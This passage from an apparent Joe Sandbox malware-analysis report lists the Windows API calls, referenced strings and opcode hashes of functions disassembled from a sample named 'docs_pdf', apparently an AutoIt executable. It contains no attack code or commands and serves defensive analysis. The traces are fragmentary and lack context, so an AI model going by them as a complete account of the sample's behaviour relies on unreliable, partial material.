                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                    • String ID:
                                    • API String ID: 1946975507-0
                                    • Opcode ID: dc7693e5c960a33f0607609fef53a6a41bed67f5dcb81c9cc050ed3220be9d87
                                    • Instruction ID: 2dd248f989ec53d626a1ed6ed17f4c3947d62032698e099430efcdc92f2e3897
                                    • Opcode Fuzzy Hash: dc7693e5c960a33f0607609fef53a6a41bed67f5dcb81c9cc050ed3220be9d87
                                    • Instruction Fuzzy Hash: 33E06531900145BADF315F65F80D7D83B14EB06332F008356FBA9880E5C7764581EB52
                                    APIs
                                    • GetCurrentThread.KERNEL32 ref: 01008C63
                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,0100882E), ref: 01008C6A
                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0100882E), ref: 01008C77
                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,0100882E), ref: 01008C7E
                                    Similarity
                                    • API ID: CurrentOpenProcessThreadToken
                                    • String ID:
                                    • API String ID: 3974789173-0
                                    • Opcode ID: ef5ba4e536cb1677d084fe6156a572708e88bf74776301de30543ff64cd1e229
                                    • Instruction ID: b06a3e5a74ab6463e871b3207a4338f502b843468d475ca612c0f7072577029a
                                    • Opcode Fuzzy Hash: ef5ba4e536cb1677d084fe6156a572708e88bf74776301de30543ff64cd1e229
                                    • Instruction Fuzzy Hash: EBE08636E42222DBE7705FB46E0CF567BBCFF41792F048859B2C5C9084DA398041CB52
                                    APIs
                                    • GetDesktopWindow.USER32 ref: 00FF2187
                                    • GetDC.USER32(00000000), ref: 00FF2191
                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00FF21B1
                                    • ReleaseDC.USER32(?), ref: 00FF21D2
                                    Similarity
                                    • API ID: CapsDesktopDeviceReleaseWindow
                                    • String ID:
                                    • API String ID: 2889604237-0
                                    • Opcode ID: 3a2d9b545d05b75cbed68de30e1c852b4005c1a56cc6003a4e9b664a49c38b83
                                    • Instruction ID: fa9d3ea2463a3939345b3606ffe3c2806866d55d6d22d83c8c9ff26185dafb99
                                    • Opcode Fuzzy Hash: 3a2d9b545d05b75cbed68de30e1c852b4005c1a56cc6003a4e9b664a49c38b83
                                    • Instruction Fuzzy Hash: FEE0E575800209EFDB119FB1C808AADBBB9EB4C350F108406F99AA7210CB7D8141AF42
                                    APIs
                                    • GetDesktopWindow.USER32 ref: 00FF219B
                                    • GetDC.USER32(00000000), ref: 00FF21A5
                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00FF21B1
                                    • ReleaseDC.USER32(?), ref: 00FF21D2
                                    Similarity
                                    • API ID: CapsDesktopDeviceReleaseWindow
                                    • String ID:
                                    • API String ID: 2889604237-0
                                    • Opcode ID: 489fe7a8e22e227abd514d7166fa850c44c58ddf0bcd680f593004e14d9a352a
                                    • Instruction ID: 2e4ad896e32695a590f5116e255f5922522210982d251ef401e57159e720ae65
                                    • Opcode Fuzzy Hash: 489fe7a8e22e227abd514d7166fa850c44c58ddf0bcd680f593004e14d9a352a
                                    • Instruction Fuzzy Hash: C8E01A75C00205AFCB219FB1C808A9DBBF9EB4C310F108405F99AA7210CB7D9141AF41
                                    APIs
                                    • OleSetContainedObject.OLE32(?,00000001), ref: 0100B981
                                    Strings
                                    Similarity
                                    • API ID: ContainedObject
                                    • String ID: AutoIt3GUI$Container
                                    • API String ID: 3565006973-3941886329
                                    • Opcode ID: 5b6804f9f0c09fde4fd04d041456a00ff62305633d8ada38c298e995df47c47f
                                    • Instruction ID: 94886104477d3abae4605fdf481dbdb23e159ab0e97ccfb79482260586bf7fc8
                                    • Opcode Fuzzy Hash: 5b6804f9f0c09fde4fd04d041456a00ff62305633d8ada38c298e995df47c47f
                                    • Instruction Fuzzy Hash: 3D915D746006019FEB65CF68C884A6ABBE9FF49710F14856DF98ACB7A1DB71E840CB50
                                    APIs
                                      • Part of subcall function 00FCFEC6: _wcscpy.LIBCMT ref: 00FCFEE9
                                      • Part of subcall function 00FB9997: __itow.LIBCMT ref: 00FB99C2
                                      • Part of subcall function 00FB9997: __swprintf.LIBCMT ref: 00FB9A0C
                                    • __wcsnicmp.LIBCMT ref: 0101B298
                                    • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0101B361
                                    Strings
                                    Similarity
                                    • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                    • String ID: LPT
                                    • API String ID: 3222508074-1350329615
                                    • Opcode ID: 44cce5dbefff4f50cae8e139cd2bfe6d489abb1c0573c0e66a082440141164f8
                                    • Instruction ID: 2fb1f640e4c8035c592985a010a6217c511a73267a13c5de75676f007c3eacbc
                                    • Opcode Fuzzy Hash: 44cce5dbefff4f50cae8e139cd2bfe6d489abb1c0573c0e66a082440141164f8
                                    • Instruction Fuzzy Hash: B3618775A00215EFDB14DF98C845EEEB7F5EF08310F058099F986AB251D778AE44CB51
                                    APIs
                                    • Sleep.KERNEL32(00000000), ref: 00FC2AC8
                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 00FC2AE1
                                    Strings
                                    Similarity
                                    • API ID: GlobalMemorySleepStatus
                                    • String ID: @
                                    • API String ID: 2783356886-2766056989
                                    • Opcode ID: cf8ec0c6e4b1bd93095179e84acb68e2f9f02241f3a94fd0c31e5f4f476c327b
                                    • Instruction ID: bea49d4afacc35b41378bbf6978cce3f1bbe106ab1c9e3ab81376310e7b3557a
                                    • Opcode Fuzzy Hash: cf8ec0c6e4b1bd93095179e84acb68e2f9f02241f3a94fd0c31e5f4f476c327b
                                    • Instruction Fuzzy Hash: 4A5168714187449BD320BF11DC86BABBBFCFB85310F42884CF2D991195EB798468DB16
                                    APIs
                                      • Part of subcall function 00FB506B: __fread_nolock.LIBCMT ref: 00FB5089
                                    • _wcscmp.LIBCMT ref: 01019AAE
                                    • _wcscmp.LIBCMT ref: 01019AC1
                                    Strings
                                    Similarity
                                    • API ID: _wcscmp$__fread_nolock
                                    • String ID: FILE
                                    • API String ID: 4029003684-3121273764
                                    • Opcode ID: 531d3edd268642c7ff9cfb1ea4f713de577693745129eaeadd99571c5025c516
                                    • Instruction ID: fc7a958de356031d1513ab73bb1509819de16add66beafa00a928c3c7303dc87
                                    • Opcode Fuzzy Hash: 531d3edd268642c7ff9cfb1ea4f713de577693745129eaeadd99571c5025c516
                                    • Instruction Fuzzy Hash: 7741DB71A0060ABADF10ABA5CC85FEF7BFDDF45714F004079B640A7185D67999049BA1
                                    APIs
                                    • _memset.LIBCMT ref: 01022892
                                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 010228C8
                                    Strings
                                    Similarity
                                    • API ID: CrackInternet_memset
                                    • String ID: |
                                    • API String ID: 1413715105-2343686810
                                    • Opcode ID: c0e1163abdfd7126db43c6ce56f92c6bcfbc7f8ef64c9ea1f8feb9749a9d5a74
                                    • Instruction ID: 2ce39bc0c29eb462e9ef4ebd49da65abe091f09116b3e3be5ccf010530596b76
                                    • Opcode Fuzzy Hash: c0e1163abdfd7126db43c6ce56f92c6bcfbc7f8ef64c9ea1f8feb9749a9d5a74
                                    • Instruction Fuzzy Hash: 41314D71901219AFCF11EFA5CC85EEEBFB9FF08340F104065F814A6165DB359916EB60
                                    APIs
                                    • DestroyWindow.USER32(?,?,?,?), ref: 01036D86
                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 01036DC2
                                    Strings
                                    Similarity
                                    • API ID: Window$DestroyMove
                                    • String ID: static
                                    • API String ID: 2139405536-2160076837
                                    • Opcode ID: 2d193f2db9383f09253aa1e02bbb58cdd99b7578905ad736ac592b0d7d1b8ca8
                                    • Instruction ID: 01f14faa6ec24f79697568c386600e4f0e2a3f2b2049a51b8eca95acc8c00252
                                    • Opcode Fuzzy Hash: 2d193f2db9383f09253aa1e02bbb58cdd99b7578905ad736ac592b0d7d1b8ca8
                                    • Instruction Fuzzy Hash: A231AF71500605AEEB11AF38CC84AFB77FCFF89720F108619F9A597190DA36A991DB60
                                    APIs
                                    • _memset.LIBCMT ref: 01012E00
                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 01012E3B
                                    Strings
                                    Similarity
                                    • API ID: InfoItemMenu_memset
                                    • String ID: 0
                                    • API String ID: 2223754486-4108050209
                                    • Opcode ID: 20d21a9976434aa5859f5d6ec156d4663b629d36fea7008bae592241abc63814
                                    • Instruction ID: d714271847718e7c3eafe98da0c191ac14d454960c9d6cd295cb9a8d64d2e28c
                                    • Opcode Fuzzy Hash: 20d21a9976434aa5859f5d6ec156d4663b629d36fea7008bae592241abc63814
                                    • Instruction Fuzzy Hash: 2E31F531A00309ABFB649F4CD844BAEBFF9FF05304F2400AAEAC5961A4E7789584CB50
                                    APIs
                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 010369D0
                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 010369DB
                                    Strings
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: Combobox
                                    • API String ID: 3850602802-2096851135
                                    • Opcode ID: 3d28f92369d29922b3a409b2e6f2ced120ee5e14aa6a201de409cca00475ab42
                                    • Instruction ID: 9891e4fa7027674b26f4e89a3ff41f8f6538a5d40ac7cba874f3ee0d7d5e38ce
                                    • Opcode Fuzzy Hash: 3d28f92369d29922b3a409b2e6f2ced120ee5e14aa6a201de409cca00475ab42
                                    • Instruction Fuzzy Hash: 1211CB717001097FEF529E18CC90EFB37AEEBC9394F110125F998DB291D6769D5187A0
                                    APIs
                                      • Part of subcall function 00FB1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00FB1D73
                                      • Part of subcall function 00FB1D35: GetStockObject.GDI32(00000011), ref: 00FB1D87
                                      • Part of subcall function 00FB1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FB1D91
                                    • GetWindowRect.USER32(00000000,?), ref: 01036EE0
                                    • GetSysColor.USER32(00000012), ref: 01036EFA
                                    Strings
                                    Similarity
                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                    • String ID: static
                                    • API String ID: 1983116058-2160076837
                                    • Opcode ID: 995e7f4b9aeeb4b051686b3bee2154b514b4df3c0be75c56c19e94f30c120caa
                                    • Instruction ID: 2a7b5e5185b4c5c31a6c21de7840bf3821314dd180506b9e8feaa926dd97d39c
                                    • Opcode Fuzzy Hash: 995e7f4b9aeeb4b051686b3bee2154b514b4df3c0be75c56c19e94f30c120caa
                                    • Instruction Fuzzy Hash: C1212972A1020AAFDB14DFA8CD45AEA7BF8FB48314F014619F995D3240E635E861DB60
                                    APIs
                                    • GetWindowTextLengthW.USER32(00000000), ref: 01036C11
                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 01036C20
                                    Strings
                                    Similarity
                                    • API ID: LengthMessageSendTextWindow
                                    • String ID: edit
                                    • API String ID: 2978978980-2167791130
                                    • Opcode ID: bfe4de127388585838c1b1e1fb632c438ca3a746d8481fd5a2829f0d662155b4
                                    • Instruction ID: 9ae78d9de400ed57001ae54905ae02110ddac9fe822046210226b67ffa5b76cd
                                    • Opcode Fuzzy Hash: bfe4de127388585838c1b1e1fb632c438ca3a746d8481fd5a2829f0d662155b4
                                    • Instruction Fuzzy Hash: 6F11BF71900108BBEB514E68DC41AFB3BADEB85378F104714F9A1971D0C736DC919B60
                                    APIs
                                    • _memset.LIBCMT ref: 01012F11
                                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 01012F30
                                    Strings
                                    Similarity
                                    • API ID: InfoItemMenu_memset
                                    • String ID: 0
                                    • API String ID: 2223754486-4108050209
                                    • Opcode ID: 8c0bec9cc8d8573048ffc512641885780010570295ca44ab47acce112f9b66b9
                                    • Instruction ID: 15534468f622c537117f7a70fe80d47f8b73d3d41fd83eade3dadc644a16d5c3
                                    • Opcode Fuzzy Hash: 8c0bec9cc8d8573048ffc512641885780010570295ca44ab47acce112f9b66b9
                                    • Instruction Fuzzy Hash: C9110B35D01154ABEB60EB5CDC04B9E7BE9EB01310F2400F5E9D5A72A8D7B9E904C791
                                    APIs
                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 01022520
                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 01022549
                                    Strings
                                    Similarity
                                    • API ID: Internet$OpenOption
                                    • String ID: <local>
                                    • API String ID: 942729171-4266983199
                                    • Opcode ID: 60d1819b5cc336cf12c4e7fd6bce896a763485cb848940d109864d0c812f6a07
                                    • Instruction ID: 892e525664b1dc5d235edce19e920b0bc2b9cdad763c875278e888aa0a0a7029
                                    • Opcode Fuzzy Hash: 60d1819b5cc336cf12c4e7fd6bce896a763485cb848940d109864d0c812f6a07
                                    • Instruction Fuzzy Hash: BA110270500235BEDB258F958C99EBBFFACFF06251F00816AF98686000D6706990CAF0
                                    APIs
                                      • Part of subcall function 0102830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,010280C8,?,00000000,?,?), ref: 01028322
                                    • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 010280CB
                                    • htons.WSOCK32(00000000,?,00000000), ref: 01028108
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWidehtonsinet_addr
                                    • String ID: 255.255.255.255
                                    • API String ID: 2496851823-2422070025
                                    • Opcode ID: 668e8f7a88efe5ebd8a6cdeb3f2ed20ad5d686a0275424db52e3641e44a63f50
                                    • Instruction ID: ead4bc8336e9a96ce9cae5e96f3ed2f970502772f3e4429f043725d39c42fbab
                                    • Opcode Fuzzy Hash: 668e8f7a88efe5ebd8a6cdeb3f2ed20ad5d686a0275424db52e3641e44a63f50
                                    • Instruction Fuzzy Hash: 8B11E538600216ABDB20AF64CC85FEDB7A8FF14310F10C557EA51972D1DB76A810C755
                                    APIs
                                      • Part of subcall function 00FB7F41: _memmove.LIBCMT ref: 00FB7F82
                                      • Part of subcall function 0100B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0100B0E7
                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 01009355
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ClassMessageNameSend_memmove
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 372448540-1403004172
                                    • Opcode ID: 6977fac07e13b8f8d677c6cf539f135f80f3aa71764e81cdf34c46dbbc8d5c8b
                                    • Instruction ID: faae02844b8e4c995ac6950c4e8fb72679625f82423cac839b738a855cf78b91
                                    • Opcode Fuzzy Hash: 6977fac07e13b8f8d677c6cf539f135f80f3aa71764e81cdf34c46dbbc8d5c8b
                                    • Instruction Fuzzy Hash: 8201F171A01215ABDB05FBA5CC918FE77ADBF06320F004609F9B26B2D2DA3958089B50
                                    APIs
                                      • Part of subcall function 00FB7F41: _memmove.LIBCMT ref: 00FB7F82
                                      • Part of subcall function 0100B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0100B0E7
                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 0100924D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ClassMessageNameSend_memmove
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 372448540-1403004172
                                    • Opcode ID: a39ef681c6fb379979f4d623baa647a8c2a958dc75fe0d9236f9c549278b5799
                                    • Instruction ID: 77ec6a28a0522f4bf09e4a3b222e917cab925642716cf2bd2b9fecbd9b4b4f68
                                    • Opcode Fuzzy Hash: a39ef681c6fb379979f4d623baa647a8c2a958dc75fe0d9236f9c549278b5799
                                    • Instruction Fuzzy Hash: CD014771A402046BDB05FBA1CC92EFE77AC9F05300F100119B986672C2EA285F0C96B1
                                    APIs
                                      • Part of subcall function 00FB7F41: _memmove.LIBCMT ref: 00FB7F82
                                      • Part of subcall function 0100B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0100B0E7
                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 010092D0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ClassMessageNameSend_memmove
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 372448540-1403004172
                                    • Opcode ID: 5a85c1e801a414436643ed0b89c4605029c98eeee95495477db6da0676066a28
                                    • Instruction ID: 270ee1fea5883ee48239dec1695bb2f2e15e024d5fa79e45496db64e64b6648f
                                    • Opcode Fuzzy Hash: 5a85c1e801a414436643ed0b89c4605029c98eeee95495477db6da0676066a28
                                    • Instruction Fuzzy Hash: B1012671A412096BEB01FBA5CD92EFE77AC9F10700F140119B986772C2DA295F0C96B2
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ClassName_wcscmp
                                    • String ID: #32770
                                    • API String ID: 2292705959-463685578
                                    • Opcode ID: 6c463c378abd7705058b693835ef6182ad0273d738f015012299c49771090f8e
                                    • Instruction ID: 8b4bfba4eec6c0f8a58a0113bd3abfce0a440e06427bf4010e82f30671e297fb
                                    • Opcode Fuzzy Hash: 6c463c378abd7705058b693835ef6182ad0273d738f015012299c49771090f8e
                                    • Instruction Fuzzy Hash: 5BE06833E0022D2BE320AB9AAC09FA7FBECEB41771F00005BFD50E7040E5649A048BE1
                                    APIs
                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 010081CA
                                      • Part of subcall function 00FD3598: _doexit.LIBCMT ref: 00FD35A2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Message_doexit
                                    • String ID: AutoIt$Error allocating memory.
                                    • API String ID: 1993061046-4017498283
                                    • Opcode ID: 27f7e05b6556bebcc64171e19025440375c45c9f462fef6429c88c3c906ad99b
                                    • Instruction ID: 39f87c2309912e562f8095731082343ca0ffc50edd5a262f59d5998afbfdff53
                                    • Opcode Fuzzy Hash: 27f7e05b6556bebcc64171e19025440375c45c9f462fef6429c88c3c906ad99b
                                    • Instruction Fuzzy Hash: 4ED0123228531936E21532AA7D0AFC5798C4B09B55F044066BB48995C3CAEA558152A9
                                    APIs
                                      • Part of subcall function 00FEB564: _memset.LIBCMT ref: 00FEB571
                                      • Part of subcall function 00FD0B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00FEB540,?,?,?,00FB100A), ref: 00FD0B89
                                    • IsDebuggerPresent.KERNEL32(?,?,?,00FB100A), ref: 00FEB544
                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00FB100A), ref: 00FEB553
                                    Strings
                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00FEB54E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                    • API String ID: 3158253471-631824599
                                    • Opcode ID: ce72e395e215b7312ec42f181b2ab23757266ff70b419c3471ef82d322e99e3f
                                    • Instruction ID: 3d804dcad676e9b7dd3238517b63a3a154db6748a06a63a7b996f1eed38aa840
                                    • Opcode Fuzzy Hash: ce72e395e215b7312ec42f181b2ab23757266ff70b419c3471ef82d322e99e3f
                                    • Instruction Fuzzy Hash: DDE06D74A00751CBD370DF2AD5047437BE4AF04754F08892DE8C6C6659EBB9D404DB61
                                    APIs
                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 01035BF5
                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 01035C08
                                      • Part of subcall function 010154E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0101555E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: FindMessagePostSleepWindow
                                    • String ID: Shell_TrayWnd
                                    • API String ID: 529655941-2988720461
                                    • Opcode ID: 0c27c994d2dfe8154b85e1705c3734a7c9b13ad47bfdcffee08916b57c37312c
                                    • Instruction ID: fdb8af1a59005060da06484c8e0ce1456d7eb5d514fa8f59529a6c49a9c46590
                                    • Opcode Fuzzy Hash: 0c27c994d2dfe8154b85e1705c3734a7c9b13ad47bfdcffee08916b57c37312c
                                    • Instruction Fuzzy Hash: 63D0C932788312B7E774BA70AC1BFD76A18AB55B51F000829B795AE1D4D9F95800C750